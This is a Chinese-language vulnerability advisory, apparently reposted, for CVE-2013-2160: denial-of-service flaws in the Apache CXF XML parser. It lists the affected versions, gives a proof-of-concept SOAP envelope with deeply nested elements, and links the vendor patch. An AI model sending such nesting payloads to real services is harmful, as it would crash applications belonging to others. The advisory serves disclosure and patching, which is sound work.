zoukankan      html  css  js  c++  java

  • Apache CXF多个远程拒绝服务漏洞(CVE-2013-2160)

    漏洞版本:

    Apache Group CXF <= 2.5.10
Apache Group CXF 2.7.4
Apache Group CXF 2.6.7

    漏洞描述:

    BUGTRAQ  ID: 61030
CVE(CAN) ID: CVE-2013-2160

Apache CXF是一个开源服务框架,用于使用JAX-WS、JAX-RS等前端编程API编译和开发服务。

Apache CXF 2.5.10, 2.6.7, 2.7.4存在多个远程拒绝服务漏洞,流XML解析器没有限制元素数、属性数、接收文档嵌套结构等,攻击者利用这些漏洞可造成应用崩溃,导致拒绝服务。
    <* 参考
    http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc?version=1&amp;amp;modificationDate=1372
    *>

    测试方法:

    本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. <?xml version='1.0'?>
    2. <soap:Envelopexmlns:soap='http://www.example.com/2003/05/soap-envelope';>
    3. <soap:Body>
    4. <element>
    5. <element>
    6. <element>
    7. <element>
    8. [thousands more]
    9. </element>
    10. </element>
    11. </element>
    12. </element>
    13. </soap:Body>
    14. </soap:Envelope>

    安全建议:

    厂商补丁:

Apache Group
------------
Apache Group已经为此发布了一个安全公告(CVE-2013-2160)以及相应补丁:
CVE-2013-2160:Denial of Service Attacks on Apache CXF
链接:http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc?version=1&modificationDate=1372
  • 相关阅读:
    Python
    Python 学习之路
    Python 学习之路
    Python 学习之路
    Python 学习之路
    Python 学习之路
    Python 学习之路
    Python学习之路
    Python 学习之路
    Python 学习之路
  • 原文地址:https://www.cnblogs.com/security4399/p/3185094.html
Copyright © 2011-2022 走看看